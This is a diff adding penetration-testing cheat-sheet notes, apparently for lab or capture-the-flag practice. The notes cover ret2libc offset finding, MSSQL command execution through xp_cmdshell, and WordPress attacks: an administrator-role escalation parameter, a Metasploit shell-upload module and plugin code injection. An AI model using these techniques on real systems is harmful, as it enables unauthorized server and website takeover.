mssql

exploit/binaries/ret2libc.md

@@ -0,0 +1,13 @@
+# Ret2libc
+
+
+## Finding offsets
+
+* On target find `sh` address inside libc
+```sh
+strings -a -t x /lib32/libc.so.6 | grep /bin/sh
+```
+* Sub from `system` address from inside libc
+```sh
+readelf -s /lib32/libc.so.6 | grep system
+```

exploit/sqli/mssql.md

@@ -0,0 +1,9 @@
+# MSSQL
+
+# Usage
+
+* `sqsh` as a shell
+* After connection is established check `xp_cmdshell'
+```sh
+xp_cmdshell 'whoami';
+```

exploit/web/wordpress.md

@@ -0,0 +1,22 @@
+# Wordpress
+
+## ure_user_roles
+
+* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
+* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)
+
+* Update user profile and append POST parameter to gain administrator role on user
+```sh
+&ure_other_roles=administrator
+```
+
+## Shell Upload
+
+* Msfconsole
+```sh
+exploit/unix/webapp/wp_admin_shell_upload
+```
+
+## Template & Plugin Editing
+
+* If template injection does not work, use plugin injection on `akismet.php`